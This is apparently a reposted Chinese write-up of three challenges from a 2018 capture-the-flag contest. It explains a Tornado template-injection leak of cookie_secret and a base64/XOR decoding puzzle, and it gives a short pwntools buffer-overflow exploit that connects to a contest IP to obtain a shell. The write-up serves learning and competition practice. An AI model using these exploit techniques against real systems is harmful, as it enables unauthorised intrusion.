经验首页 前端设计 程序设计 Java相关 移动开发 数据库/运维 软件/图像 大数据/云计算 其他经验
当前位置:技术经验 » 其他 » 网络安全 » 查看文章
护网杯划水
来源:cnblogs  作者:B1u3Buf4  时间:2018/10/15 9:18:47  对本文有异议

题目没有截图。

WEB-easy tornado

三个文件,给了3个提示文件。综合起来看,主要是读文件,不过需要一个参数signature,根据给出的提示文件的URL,signature就是提示中产生的MD5。所以还需要一个cookie_secret,cookie里没有,应该是隐含在服务器里了。render()提示应该是一个SSTI漏洞。撸了一下flag文件,报错,URL里出现了模板符号,印证了想法。然后去翻tornado文档,主要看模板和配置。文档说当前的请求内容主要放在handler对象里,试出来了一个handler.settings暴露参数,cookie_secret。两个参数:file为文件名,signature带上算出转换后的MD5访问文件,得到flag。

PWN-gettingstart

用 IDA 打开程序,整个解题思路就已经明摆在面前了,溢出buf达到pwn的目的。
起shell的条件是(v7 == 0x7FFFFFFFFFFFFFFF && v8 == 0.1)

作为静态调试工具,IDA能F5插件能解析出来的,都能在程序里找得到。v8的十进制值0.1就是qword_c10对应的16进制值。

主要覆盖的是v8,但波及到了v7,所以v7也要重写。相差0x18,也就是24。

  1. from pwn import *
  2. p = remote("49.4.78.31", 30482)
  3. p.sendlineafter('you', 'x' * 24 + p64(0x7FFFFFFFFFFFFFFF) + p64(0x3FB999999999999A))
  4. p.interactive()

MISC-迟来的签到题

base64解码后异或

  1. import base64
  2. s = base64.b64decode('AAoHAR0jJ1AlVVEkU1BUVCAlIlFTUVUiUFRTVFVeU1FXUCVUJxs=')
  3. for n in range(127):
  4. flag=''
  5. for i in s[:4]:
  6. flag += ''.join(chr(i ^ n))
  7. if 'flag' in flag:
  8. for i in s[4:]:
  9. flag += ''.join(chr(i ^ n))
  10. print(n)
  11. print(flag)
 友情链接:直通硅谷  点职佳  北美留学生论坛

本站QQ群:前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试,对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们  |  意见建议  |  捐助我们  |  报错有奖  |  广告合作、友情链接(目前9元/月)请联系QQ:27243702 沸活量
皖ICP备17017327号-2 皖公网安备34020702000426号